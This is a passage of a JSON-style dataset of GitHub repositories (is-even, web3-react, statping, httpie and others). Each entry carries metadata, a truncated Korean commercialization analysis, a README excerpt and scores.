보물인가\n프로그래머들이 자주 쓰는 기능을 1~2줄의 짧은 코드로 만드는 방법을 모아놓아서, 코드를 더 빠르고 쉽게 작성할 수 있게 도와주는 저장소입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 프로그래밍 학원이나 온라인 교육 회사에서 \"일주일에 유용한 1줄 코드\" 같은 구독형 강좌 제","readme_excerpt":"# Favorite single line of code\n\nWhat's your favorite JavaScript single LOC (line of code)? Let me know!\n\n## Contributing\n\nPull requests are welcomed. To submit your favorite JavaScript single line of code, please create a markdown file, and put it in the [contents](contents) folder.\n\n## About\n\nThis project is developed by _Nguyen Huu Phuoc_. I love building products and sharing knowledge.\n\nBe my friend on\n\n-   [Twitter](https://twitter.com/_phuocng)\n-   [Github](https://github.com/phuocng)\n","composite_score":0.4947,"license_safety_tag":"safe"},{"name":"1milligram/1loc","github_url":"https://github.com/1milligram/1loc","stars":5,"language":"MDX","license":"MIT","abandonment_months":23,"description":"# 1milligram/1loc 저장소 분석\n\n## 왜 보물인가\n코드 한 줄로 복잡한 기능을 구현할 수 있는 극도로 간결한 라이브러리라서, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 빠른 프로토타입 개발이 필요한 스타트업이 개발 속도를 높이는 백엔드 라이브러리로 판매\n- **내부 업무 도구**: 기업들이 ","readme_excerpt":"# Favorite single line of code\n\nWhat's your favorite JavaScript single LOC (line of code)? Let me know!\n\n## Contributing\n\nPull requests are welcomed. To submit your favorite JavaScript single line of code, please create a markdown file, and put it in the [contents](contents) folder.\n\n## About\n\nThis project is developed by _Nguyen Huu Phuoc_. I love building products and sharing knowledge.\n\nBe my friend on\n\n-   [Twitter](https://twitter.com/_phuocng)\n-   [Github](https://github.com/phuocng)\n","composite_score":0.4946,"license_safety_tag":"safe"},{"name":"anncwb/vben-admin-thin-next","github_url":"https://github.com/anncwb/vben-admin-thin-next","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":23,"description":"# vben-admin-thin-next 상용화 분석\n\n## 왜 보물인가\n기업 업무용 관리 프로그램을 빠르게 만들 수 있는 무료 기초 틀이므로, 이를 개선해 여러 회사에 판매할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (구독형 클라우드 서비스)**\n- 중소기업용 매출 관리, 재고 관리, 직원 일정 관리 시스템으로 월 구독료 받으며","readme_excerpt":"<div align=\"center\"> <a href=\"https://github.com/anncwb/vue-vben-admin\"> <img alt=\"VbenAdmin Logo\" width=\"200\" height=\"200\" src=\"https://anncwb.github.io/anncwb/images/logo.png\"> </a> <br> <br>\n\n[![license](https://img.shields.io/github/license/anncwb/vue-vben-admin.svg)](LICENSE)\n\n<h1>Vue vben admin</h1>\n</div>\n\n**English** | [中文](./README.zh-CN.md)\n\n## Introduction\n\nVue Vben Admin is a free and open source middle and back-end template. Using the latest `vue3`, `vite2`, `TypeScript` and other mainstream technology development, the out-of-the-box middle and back-end front-end solutions can also be used for learning reference.\n\n## Feature\n\n- **State of The Art Development**：Use front-end front-end technology development such as Vue3/vite2\n- **TypeScript**: Application-level JavaScript language\n- **Theming**: Configurable themes\n- **International**：Built-in complete internationalization program\n- **Mock Server** Built-in mock data scheme\n- **Authority** Built-in complete dynamic routing ","composite_score":0.4946,"license_safety_tag":"safe"},{"name":"samuelmarina/is-even","github_url":"https://github.com/samuelmarina/is-even","stars":8,"language":"","license":"unknown","abandonment_months":24,"description":"# is-even 저장소 분석\n\n## 왜 보물인가\n짝수 판정이라는 단순하지만 널리 필요한 기능을 제공하며, 8개의 별을 받은 것은 사용자들이 이 간단한 솔루션에 가치를 인정했다는 의미입니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 검증 SaaS**: 온라인 양식에서 사용자가 입력한 숫자가 짝수인지 검증하는 웹 서비스로 운영\n2. **회계 소프트웨어 내부","readme_excerpt":"# is-even [![npm](https://img.shields.io/npm/v/@samuelmarina/is-even)](https://www.npmjs.com/package/@samuelmarina/is-even) [![YouTube Channel Subscribers](https://img.shields.io/youtube/channel/subscribers/UCJKYubtV1bfbhS-SxTm9Z1A?style=social)](https://youtube.com/sammillervlogs)\n> Return true if the number passed is even, hopefully...\n\n## Install\nInstall with [npm](https://www.npmjs.com/)\n```sh\n$ npm install --save @samuelmarina/is-even\n```\n\n## How to use it\n```js\nvar isEven = require('@samuelmarina/is-even');\n\nisEven(1); //false\nisEven(2); //true\nisEven(3); //false\n// And so on... just for a little while\n```\n## About\nThis is a 100% serious project, and it is made to help the community. There are a lot of cases where young developers face the issue of finding if a number is even, so I \ndecided to help them by creating this beautiful package. Hopefully, someday it will be completed...\n<br />\nIt is also important to know if a number is odd, so additionally I created this other package","composite_score":0.4944,"license_safety_tag":"unknown"},{"name":"NoahZinsmeister/web3-react","github_url":"https://github.com/NoahZinsmeister/web3-react","stars":19,"language":"TypeScript","license":"GPL-3.0","abandonment_months":21,"description":"# web3-react 상용화 분석\n\n## 왜 보물인가\n블록체인 기술을 웹사이트에 연결하는 핵심 도구로, 암호화폐 거래 플랫폼과 디지털 자산 서비스 개발에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소 SaaS**: 중소 거래소가 자신의 플랫폼을 빠르게 구축할 수 있는 기반 기술 제공\n2. **디지털 지갑 API 판매**: 개인 개발자나","readme_excerpt":"# web3-react (beta)\n\n[![CI](https://github.com/Uniswap/web3-react/actions/workflows/CI.yml/badge.svg)](https://github.com/Uniswap/web3-react/actions/workflows/CI.yml)\n\n_Looking for the prior version of this library? It's available on the [v6 branch](https://github.com/Uniswap/web3-react/tree/v6)._\n\n## [Example](https://web3-react-mu.vercel.app/)\n\nThis is a hosted version of [example](/example).\n\n## Packages\n\n| Package                                                   | Version                                                                                                                                       | Size                                                                                                                                                             | Link                                                                      |\n|-----------------------------------------------------------|----------------------------------------------------------------------------------","composite_score":0.4942,"license_safety_tag":"restricted"},{"name":"sail-sg/poolformer","github_url":"https://github.com/sail-sg/poolformer","stars":15,"language":"Python","license":"Apache-2.0","abandonment_months":24,"description":"# PoolFormer 저장소 분석\n\n## 왜 보물인가\n이미지 인식 작업을 빠르고 효율적으로 처리하는 새로운 방식을 제공하여, 스마트폰 앱부터 산업용 카메라까지 다양한 분야에서 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **스마트폰 사진 분석 SaaS**: 사용자가 업로드한 사진에서 물체 인식, 텍스트 추출 등을 자동으로 처리하는 웹/앱 서비스\n","readme_excerpt":"# PoolFormer: [MetaFormer Is Actually What You Need for Vision](https://arxiv.org/abs/2111.11418) (CVPR 2022 Oral)\n\n<p align=\"center\">\n<a href=\"https://arxiv.org/abs/2111.11418\" alt=\"arXiv\">\n    <img src=\"https://img.shields.io/badge/arXiv-2111.11418-b31b1b.svg?style=flat\" /></a>\n<a href=\"https://huggingface.co/spaces/akhaliq/poolformer\" alt=\"Hugging Face Spaces\">\n    <img src=\"https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-Spaces-blue\" /></a>\n<a href=\"https://colab.research.google.com/drive/1n1UK4ihfiySTWTDuusAhm_6CLm1h4bTj?usp=sharing\" alt=\"Colab\">\n    <img src=\"https://colab.research.google.com/assets/colab-badge.svg\" /></a>\n</p>\n\n\n---\n:fire: :fire: Our follow-up work \"[MetaFormer Baselines for Vision](https://arxiv.org/abs/2210.13452)\" (code: [metaformer](https://github.com/sail-sg/metaformer)) introduces more MetaFormer baselines including\n+ **IdentityFormer** with token mixer of identity mapping surprisingly achieve >80% accuracy.\n+ **RandFormer** achieves >81% accura","composite_score":0.4941,"license_safety_tag":"safe"},{"name":"thepranaygupta/Data-Structures-and-Algorithms","github_url":"https://github.com/thepranaygupta/Data-Structures-and-Algorithms","stars":8,"language":"Java","license":"GPL-3.0","abandonment_months":23,"description":"# Data-Structures-and-Algorithms 저장소 분석\n\n## 왜 보물인가\n프로그래밍의 기초가 되는 핵심 개념들을 체계적으로 정리한 교육용 자료로, 초급자부터 취업 준비생까지 두루 활용할 수 있는 학습 자산입니다.\n\n## 어디에 쓸 수 있나\n- **코딩 교육 SaaS**: 이 자료를 기반으로 온라인 프로그래밍 강의 플랫폼을 구축하여 학생들에","readme_excerpt":"<div align=\"center\">\r\n<h1>Data Structures and Algorithms</h1>\r\n\r\n<a href=\"https://github.com/thepranaygupta/Data-Structures-and-Algorithms\"><img src=\"https://sloc.xyz/github/thepranaygupta/Data-Structures-and-Algorithms\" alt=\"LOC\"/></a>\r\n<a href=\"https://github.com/thepranaygupta/Data-Structures-and-Algorithms\"><img src=\"https://visitor-badge.laobi.icu/badge?page_id=thepranaygupta.Data-Structures-and-Algorithms\" alt=\"visitor count\"/></a>\r\n<a href=\"https://github.com/thepranaygupta/Data-Structures-and-Algorithms/stargazers\"><img src=\"https://img.shields.io/github/stars/thepranaygupta/Data-Structures-and-Algorithms\" alt=\"Stars Badge\"/></a>\r\n<a href=\"https://github.com/thepranaygupta/Data-Structures-and-Algorithms/network/members\"><img src=\"https://img.shields.io/github/forks/thepranaygupta/Data-Structures-and-Algorithms\" alt=\"Forks Badge\"/></a>\r\n<a href=\"https://github.com/thepranaygupta/Data-Structures-and-Algorithms/graphs/contributors\"><img alt=\"GitHub contributors\" src=\"https://img.s","composite_score":0.4934,"license_safety_tag":"restricted"},{"name":"trimstray/htrace.sh","github_url":"https://github.com/trimstray/htrace.sh","stars":10,"language":"Shell","license":"GPL-3.0","abandonment_months":18,"description":"# htrace.sh 프로젝트 분석\n\n## 왜 보물인가\n컴퓨터의 문제를 진단할 때 어떤 부분이 잘못되었는지 자동으로 추적하고 검증해주는 도구로, 기술 지원팀의 업무 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **IT 지원 SaaS**: 회사 직원들이 컴퓨터 문제를 보고하면 자동으로 원인을 분석해주는 온라인 서비스\n2. **서버 모니터","readme_excerpt":"<p align=\"left\">\n  <a href=\"https://travis-ci.org/trimstray/htrace.sh\">\n    <img src=\"https://travis-ci.org/trimstray/htrace.sh.svg?branch=master\" alt=\"Travis-CI\">\n  </a>\n  <a href=\"https://github.com/trimstray/htrace.sh/tree/master/build\">\n    <img src=\"https://img.shields.io/badge/Dockerfile-Available-blue.svg\" alt=\"Dockerfile\">\n  </a>\n</p>\n\n<br>\n\n<p align=\"center\">\n  <a href=\"https://github.com/trimstray/htrace.sh\">\n    <img src=\"https://github.com/trimstray/htrace.sh/blob/master/static/img/htrace.sh_logo.png\" alt=\"Master\">\n  </a>\n</p>\n\n<br>\n\n## Description\n\n`htrace.sh` is a shell script for http/https troubleshooting and profiling. It's also a simple wrapper around several open source security tools.\n\nFor a more detailed understanding of `htrace.sh`, its parameters, functions and how it all works, run `htrace.sh --examples` or see the **[Wiki](https://github.com/trimstray/htrace.sh/wiki)**.\n\n## Preview\n\n<p align=\"center\">\n  <img src=\"https://github.com/trimstray/htrace.sh/blob/mast","composite_score":0.4932,"license_safety_tag":"restricted"},{"name":"statping/statping","github_url":"https://github.com/statping/statping","stars":7,"language":"Vue","license":"GPL-3.0","abandonment_months":23,"description":"# Statping 저장소 분석\n\n## 왜 보물인가\n웹사이트가 정상적으로 작동하는지 24시간 자동으로 감시해주는 무료 모니터링 시스템으로, 비용을 들이지 않고도 서비스 장애를 즉시 알 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 제공**\n- 월 구독 형태로 기업들의 웹사이트 감시 서비스 판매\n\n**2. 내부 업무 도구**\n- 전자상거","readme_excerpt":"<p align=\"center\">\n<img width=\"60%\" src=\"https://s3-us-west-2.amazonaws.com/gitimgs/statping.png\">\n</p>\n<p align=\"center\">\n    <b>Statping - Web and App Status Monitoring for Any Type of Project</b><br>\n<a href=\"https://github.com/statping/statping/wiki\">View Wiki</a> | <a href=\"https://demo.statping.com\">Demo</a> | <a href=\"https://itunes.apple.com/us/app/apple-store/id1445513219\">iPhone</a> | <a href=\"https://play.google.com/store/apps/details?id=com.statping\">Android</a> <br> <a href=\"http://docs.statping.com\">API</a> | <a href=\"https://github.com/statping/statping/wiki/Docker\">Docker</a> | <a href=\"https://github.com/statping/statping/wiki/AWS-EC2\">EC2</a> | <a href=\"https://github.com/statping/statping/wiki/Mac\">Mac</a> | <a href=\"https://github.com/statping/statping/wiki/Linux\">Linux</a> | <a href=\"https://github.com/statping/statping/wiki/Windows\">Windows</a>\n</p>\n\n# Statping - Status Page & Monitoring Server\nAn easy to use Status Page for your websites and applications. Statpin","composite_score":0.493,"license_safety_tag":"restricted"},{"name":"dotnet/corefx","github_url":"https://github.com/dotnet/corefx","stars":7,"language":"","license":"unknown","abandonment_months":41,"description":"# dotnet/corefx 평가 보고서\n\n## 왜 보물인가\n마이크로소프트의 공식 .NET 기술 기반으로, 윈도우·맥·리눅스 등 다양한 환경에서 작동하는 소프트웨어 개발의 핵심 구성요소입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 업무 관리 플랫폼이나 협업 도구의 백엔드 기술로 활용\n2. **내부 업무 도구**: 대기업의 ","readme_excerpt":"Going forward, the .NET team is using https://github.com/dotnet/runtime to\r\ndevelop the code and issues formerly in this repository.\r\n\r\nPlease see the following for more context:\r\n\r\n[dotnet/announcements#119 \"Consolidating .NET GitHub repos\"](https://github.com/dotnet/announcements/issues/119)","composite_score":0.4927,"license_safety_tag":"unknown"},{"name":"makcedward/nlpaug","github_url":"https://github.com/makcedward/nlpaug","stars":6,"language":"Jupyter Notebook","license":"mit","abandonment_months":23,"description":"# nlpaug 저장소 분석\n\n## 왜 보물인가\n텍스트 데이터를 자동으로 다양하게 변형해 AI 모델 학습 품질을 높이는 데이터 증강 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 챗봇 및 고객 응답 자동화 SaaS**\n- 고객 질문 데이터를 다양하게 변형하여 챗봇의 이해도를 높이는 백엔드 기술로 활용\n\n**2. 내부 문서 분류 및 검색 시스템**\n- 기","readme_excerpt":"<p align=\"center\">\n    <br>\n    <img src=\"https://github.com/makcedward/nlpaug/blob/master/res/logo_small.png\"/>\n    <br>\n<p>\n<p align=\"center\">\n    <a href=\"https://travis-ci.org/makcedward/nlpaug\">\n        <img alt=\"Build\" src=\"https://travis-ci.org/makcedward/nlpaug.svg?branch=master\">\n    </a>\n    <a href=\"https://www.codacy.com/app/makcedward/nlpaug?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=makcedward/nlpaug&amp;utm_campaign=Badge_Grade\">\n        <img alt=\"Code Quality\" src=\"https://api.codacy.com/project/badge/Grade/2d6d1d08016a4f78818161a89a2dfbfb\">\n    </a>\n    <a href=\"https://pepy.tech/badge/nlpaug\">\n        <img alt=\"Downloads\" src=\"https://pepy.tech/badge/nlpaug\">\n    </a>\n</p>\n\n# nlpaug\n\nThis python library helps you with augmenting nlp for your machine learning projects. Visit this introduction to understand about [Data Augmentation in NLP](https://towardsdatascience.com/data-augmentation-in-nlp-2801a34dfc28). `Augmenter` is the basic element of augmen","composite_score":0.4925,"license_safety_tag":"safe"},{"name":"chrisdiana/cms.js","github_url":"https://github.com/chrisdiana/cms.js","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":23,"description":"# cms.js 상용화 분석 보고서\n\n## 왜 보물인가\n누구나 쉽게 웹사이트 콘텐츠를 만들고 관리할 수 있는 간단한 도구로, 복잡한 기술 없이도 자신의 온라인 공간을 운영하고 싶은 사람들을 위한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 소규모 비즈니스(카페, 미용실, 학원)가 월 구독으로 자신의 웹사이트를 직접 만들고 관리","readme_excerpt":"![CMS.js Logo](https://raw.githubusercontent.com/chrisdiana/cms.js/gh-pages/img/logo-md.png)\n\nCMS.js is a fully **C**lient-side, JavaScript **M**arkdown **S**ite generator in the spirit of [Jekyll](https://github.com/jekyll/jekyll) that uses plain ol' HTML, CSS and JavaScript to generate your website. CMS.js is like a file-based CMS.\nIt takes your content, renders Markdown and delivers a complete website in Single-Page App fashion...without the aid of server-side scripting (no Node.js, PHP, Ruby, etc.).\n\n![CMS.js Screenshot](https://raw.githubusercontent.com/chrisdiana/cms.js/gh-pages/img/screenshot.png)\n\n\n[![Join the chat at https://discord.gg/A2cHjg3](https://img.shields.io/discourse/https/meta.discourse.org/status.svg)](https://discord.gg/A2cHjg3)\n[![Join the chat at https://gitter.im/cms-js/community](https://badges.gitter.im/cms-js/community.svg)](https://gitter.im/cms-js/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n![Version](https://img.sh","composite_score":0.4922,"license_safety_tag":"safe"},{"name":"data-science-on-aws/oreilly_book","github_url":"https://github.com/data-science-on-aws/oreilly_book","stars":9,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":22,"description":"# data-science-on-aws/oreilly_book 분석 보고서\n\n## 왜 보물인가\nAWS 클라우드에서 데이터 분석을 배우고 실무에 적용할 수 있는 실제 사례와 코드를 한 곳에서 얻을 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업들이 자신의 데이터를 분석하고 인사이트를 얻도록 돕는 온라인 서비스로 제공\n2. **내","readme_excerpt":"# Data Science on AWS - O'Reilly Book\n\nSelect a branch to explore...\n\n[![Data Science on AWS - O'Reilly Book](img/dsoaws-book.png)](https://github.com/data-science-on-aws/data-science-on-aws/tree/oreilly-book)\n\n## Get the book on [Amazon.com](https://www.amazon.com/Data-Science-AWS-End-End/dp/1492079391)!\n[![Data Science on AWS](img/book_full_color_sm.png)](https://www.amazon.com/Data-Science-AWS-End-End/dp/1492079391/)\n\n## YouTube Video\n[YouTube Video](https://youtu.be/9_SWaKdZhEM)\n\n## Book Outline\n![Book Outline](img/outline.png)\n\n## Book Examples (12 hours)\nThroughout these book examples, you will build an end-to-end AI/ML pipeline for natural language processing with Amazon SageMaker.  You will train and tune a text classifier to predict the star rating (1 is bad, 5 is good) for product reviews using the state-of-the-art [BERT](https://arxiv.org/abs/1810.04805) model for language representation.  To build our BERT-based NLP text classifier, you will use a product reviews dataset wh","composite_score":0.4917,"license_safety_tag":"safe"},{"name":"pirix-gh/ts-toolbelt","github_url":"https://github.com/pirix-gh/ts-toolbelt","stars":5,"language":"TypeScript","license":"Apache-2.0","abandonment_months":12,"description":"# ts-toolbelt 상용화 분석\n\n## 왜 보물인가\nTypeScript를 사용하는 개발자들이 복잡한 코드를 쉽게 짤 수 있도록 도와주는 재사용 가능한 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 저코드/노코드 플랫폼에서 사용자가 작성한 코드의 오류를 자동으로 찾아 수정해주는 기능\n2. **내부 업무 도구**: 소프트웨어 ","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://github.com/millsp/ts-toolbelt\">\n    <img alt=\"banner\" title=\"ts-toolbelt\" src=\"https://raw.githubusercontent.com/millsp/ts-toolbelt/master/.github/banner.svg\">\n  </a>\n  <h4 align=\"center\">TypeScript's largest utility library</h4>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/ts-toolbelt\" >\n    <img src=\"https://img.shields.io/npm/v/ts-toolbelt.svg\">\n  </a>\n  <a href=\"#\">\n    <img src=\"https://img.shields.io/npm/dm/ts-toolbelt.svg\">\n  </a>\n  <a href=\"#\">\n    <img src=\"http://isitmaintained.com/badge/resolution/millsp/ts-toolbelt.svg\"/>\n  </a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://gitter.im/ts-toolbelt/community?utm_source=share-link&utm_medium=link&utm_campaign=share-link\" >\n    <img src=\"https://img.shields.io/gitter/room/ts-toolbelt/community.svg\">\n  </a>\n  <a href=\"http://makeapullrequest.com\" >\n    <img src=\"https://img.shields.io/badge/PRs-welcome-brightgreen.svg\">\n  </a>\n  <a href=\"https://conventionalcommits.org\" >\n ","composite_score":0.4915,"license_safety_tag":"safe"},{"name":"nextapps-be/livewire-sortablejs","github_url":"https://github.com/nextapps-be/livewire-sortablejs","stars":10,"language":"JavaScript","license":"MIT","abandonment_months":20,"description":"# livewire-sortablejs 상용화 분석\n\n## 왜 보물인가\n웹사이트에서 마우스로 드래그해서 항목의 순서를 쉽게 바꿀 수 있는 기능을 간단하게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프로젝트 관리 앱에서 업무 카드를 드래그로 정렬하는 칸반 보드 기능\n2. **내부 업무 도구**: 회사 직원용 시스템에서 할","readme_excerpt":"# Livewire Sortable.js\n\n[![Latest Version on NPM](https://img.shields.io/npm/v/@wotz%2Flivewire-sortablejs.svg?style=flat-square)](https://npmjs.com/package/@wotz%2Flivewire-sortablejs)\n[![NPM total downloads](https://img.shields.io/npm/dt/@wotz%2Flivewire-sortablejs.svg?style=flat-square)](https://www.npmjs.com/package/@wotz%2Flivewire-sortablejs)\n[![NPM downloads per month](https://img.shields.io/npm/dm/@wotz%2Flivewire-sortablejs.svg?style=flat-square)](https://www.npmjs.com/package/@wotz%2Flivewire-sortablejs)\n\nA plugin/wrapper around [Sortable.js](https://github.com/SortableJS/Sortable) package.\n\n## Why use this instead of Livewire's official [livewire-sortable](https://github.com/livewire/sortable) package?\n\nThe `livewire-sortable` package uses Shopify's sortable package. We noticed some issues with that package compared to Sortable.js:\n- Shopify's sortable package does not retain an item's original height and width while dragging. Sortable.js does this by default.\n- Sortable.js ","composite_score":0.4915,"license_safety_tag":"safe"},{"name":"autonomousvision/projected_gan","github_url":"https://github.com/autonomousvision/projected_gan","stars":17,"language":"Python","license":"MIT","abandonment_months":24,"description":"# Projected GAN 상용화 분석\n\n## 왜 보물인가\n사진처럼 현실적인 이미지를 컴퓨터가 자동으로 만들어내는 기술로, 영상 제작, 게임 개발, 광고 산업에서 제작 비용과 시간을 대폭 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 이미지 생성 SaaS**: 마케팅 담당자가 직접 광고 이미지, 상품 사진, 배경화면을 만드는 웹 서비스\n","readme_excerpt":"<img src=\"media/banner.png\">\n\n#### [[Project]](https://sites.google.com/view/projected-gan/) [[PDF]](http://www.cvlibs.net/publications/Sauer2021NEURIPS.pdf) [[Supplementary]](http://www.cvlibs.net/publications/Sauer2021NEURIPS_supplementary.pdf) [[Talk]](https://recorder-v3.slideslive.com/#/share?share=50538&s=bf7a6393-410c-49d9-8edf-c61fa486c354) [[CGP Summary]](https://www.casualganpapers.com/data-efficient-fast-gan-training-small-datasets/ProjectedGAN-explained.html) [[Replicate Demo]](https://replicate.com/xl-sr/projected_gan) [[Hugging Face Spaces Demo]](https://huggingface.co/spaces/autonomousvision/projected_gan)\n\nFor a quick start, try the Colab: &nbsp; [![Projected GAN Quickstart](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/gist/xl-sr/757757ff8709ad1721c6d9462efdc347/projected_gan.ipynb)\n\nThis repository contains the code for our NeurIPS 2021 paper \"Projected GANs Converge Faster\"\n\nby [Axel Sauer](https://axelsauer.com/), [Kash","composite_score":0.4913,"license_safety_tag":"safe"},{"name":"react-spring/react-use-gesture","github_url":"https://github.com/react-spring/react-use-gesture","stars":9,"language":"TypeScript","license":"MIT","abandonment_months":23,"description":"","readme_excerpt":"# @use-gesture\n\n[![npm (tag)](https://img.shields.io/npm/v/@use-gesture/react?style=flat&colorA=000000&colorB=000000)](https://www.npmjs.com/package/@use-gesture/react) ![npm bundle size](https://img.shields.io/bundlephobia/minzip/@use-gesture/react?style=flat&colorA=000000&colorB=000000) ![NPM](https://img.shields.io/npm/l/@use-gesture/react?style=flat&colorA=000000&colorB=000000) [![Discord Shield](https://img.shields.io/discord/740090768164651008?style=flat&colorA=000000&colorB=000000&label=discord&logo=discord&logoColor=ffffff)](https://discord.gg/poimandres)\n\n@use-gesture is a library that lets you bind richer mouse and touch events to any component or view. With the data you receive, it becomes trivial to set up gestures, and often takes no more than a few lines of code.\n\nYou can use it stand-alone, but to make the most of it you should combine it with an animation library like [react-spring](https://github.com/pmndrs/react-spring), though you can most certainly use any other.\n\n<","composite_score":0.4909,"license_safety_tag":"safe"},{"name":"analysiscenter/cardio","github_url":"https://github.com/analysiscenter/cardio","stars":6,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":24,"description":"# analysiscenter/cardio 사업화 분석\n\n## 왜 보물인가\n심장 질환 진단과 분석을 자동으로 도와주는 의료용 소프트웨어로, 병원과 클리닉에서 환자 진료 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **의료 SaaS 서비스**: 병원의 심장 검진 클리닉이 월 구독으로 심전도 분석 자동화 도구를 사용\n2. **내부 업","readme_excerpt":"# CardIO\n\n`CardIO` is designed to build end-to-end machine learning models for deep research of electrocardiograms.\n\nMain features:\n\n* load and save signals in various formats: WFDB, DICOM, EDF, XML (Schiller), etc.\n* resample, crop, flip and filter signals\n* detect PQ, QT, QRS segments\n* calculate heart rate and other ECG characteristics\n* perform complex processing like fourier and wavelet transformations\n* apply custom functions to the data\n* recognize heart diseases (e.g. atrial fibrillation)\n* efficiently work with large datasets that do not even fit into memory\n* perform end-to-end ECG processing\n* build, train and test neural networks and other machine learning models\n\nFor more details see [the documentation and tutorials](https://analysiscenter.github.io/cardio/).\n\n\n## About CardIO\n\n> CardIO is based on [BatchFlow](https://github.com/analysiscenter/batchflow). You might benefit from reading [its documentation](https://analysiscenter.github.io/batchflow).\nHowever, it is not requ","composite_score":0.4909,"license_safety_tag":"safe"},{"name":"jakubroztocil/httpie","github_url":"https://github.com/jakubroztocil/httpie","stars":453,"language":"Python","license":"bsd-3-clause","abandonment_months":17,"description":"","readme_excerpt":"<h2 align=\"center\">\n    <a href=\"https://httpie.io\" target=\"blank_\">\n        <img height=\"100\" alt=\"HTTPie\" src=\"https://raw.githubusercontent.com/httpie/cli/master/docs/httpie-logo.svg\" />\n    </a>\n    <br>\n    HTTPie CLI: human-friendly HTTP client for the API era\n</h2>\n\n<div align=\"center\">\n\n[![HTTPie for Desktop](https://img.shields.io/static/v1?label=HTTPie&message=Desktop&color=4B78E6)](https://httpie.io/product)\n[![](https://img.shields.io/static/v1?label=HTTPie&message=Web%20%26%20Mobile&color=73DC8C)](https://httpie.io/app)\n[![](https://img.shields.io/static/v1?label=HTTPie&message=CLI&color=FA9BFA)](https://httpie.io/cli)\n[![Twitter](https://img.shields.io/twitter/follow/httpie?style=flat&color=%234B78E6&logoColor=%234B78E6)](https://twitter.com/httpie)\n[![Chat](https://img.shields.io/discord/725351238698270761?style=flat&label=Chat%20on%20Discord&color=%23FA9BFA)](https://httpie.io/discord)\n\n</div>\n\n\n<div align=\"center\">\n\n[![Docs](https://img.shields.io/badge/stable%20docs-h","composite_score":0.4908,"license_safety_tag":"safe"},{"name":"davidshimjs/qrcodejs","github_url":"https://github.com/davidshimjs/qrcodejs","stars":6,"language":"JavaScript","license":"mit","abandonment_months":25,"description":"# QRCode.js 상품화 분석\n\n## 왜 보물인가\nQR코드를 웹사이트나 앱에 간단히 추가할 수 있는 도구로, 명함·포장재·광고 등 실생활의 거의 모든 곳에서 필요한 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 마케팅 자동화 플랫폼에서 고객이 캠페인용 QR코드를 직접 생성·다운로드하는 기능\n2. **내부 업무 도구**: 중소 제조","readme_excerpt":"# QRCode.js\nQRCode.js is javascript library for making QRCode. QRCode.js supports Cross-browser with HTML5 Canvas and table tag in DOM.\nQRCode.js has no dependencies.\n\n## Basic Usages\n```\n<div id=\"qrcode\"></div>\n<script type=\"text/javascript\">\nnew QRCode(document.getElementById(\"qrcode\"), \"http://jindo.dev.naver.com/collie\");\n</script>\n```\n\nor with some options\n\n```\n<div id=\"qrcode\"></div>\n<script type=\"text/javascript\">\nvar qrcode = new QRCode(document.getElementById(\"qrcode\"), {\n\ttext: \"http://jindo.dev.naver.com/collie\",\n\twidth: 128,\n\theight: 128,\n\tcolorDark : \"#000000\",\n\tcolorLight : \"#ffffff\",\n\tcorrectLevel : QRCode.CorrectLevel.H\n});\n</script>\n```\n\nand you can use some methods\n\n```\nqrcode.clear(); // clear the code.\nqrcode.makeCode(\"http://naver.com\"); // make another code.\n```\n\n## Browser Compatibility\nIE6~10, Chrome, Firefox, Safari, Opera, Mobile Safari, Android, Windows Mobile, ETC.\n\n## License\nMIT License\n\n## Contact\ntwitter @davidshimjs\n\n[![Bitdeli Badge](https://d2weczhvl8","composite_score":0.4904,"license_safety_tag":"safe"},{"name":"davideuler/architecture.of.internet-product","github_url":"https://github.com/davideuler/architecture.of.internet-product","stars":5,"language":"HTML","license":"unknown","abandonment_months":28,"description":"# architecture.of.internet-product 분석\n\n## 왜 보물인가\n인터넷 서비스들이 어떻게 만들어지고 작동하는지 설계 원리를 배울 수 있는 실무 가이드입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 새로운 웹 기반 업무 도구를 만드는 스타트업의 초기 설계 단계에서 참고 자료로 활용\n2. **내부 업무 도구**: 대기","readme_excerpt":"# 互联网公司经典技术架构\n\n以数字开头的目录为互联网公司的架构文档。\n\n以英文字母A,B,C,D开头的目录按照主题分类的技术架构文档。\n\n在互联网公司架构文档中的资料，不重复放入按主题分类的目录中。  \n\n## 经典互联网公司技术架构\n\n[经典互联网技术架构](https://github.com/davideuler/architecture.of.internet-product)\n\n\n## 国内互联网公司技术架构\n[微信/腾讯技术架构](https://github.com/davideuler/architecture.wechat-tencent)\n\n[淘宝/阿里巴巴技术架构](https://github.com/davideuler/architecture.taobao-alibaba)\n\n[美团点评技术架构](https://github.com/davideuler/architecture.meituan-dianping)\n\n\n## 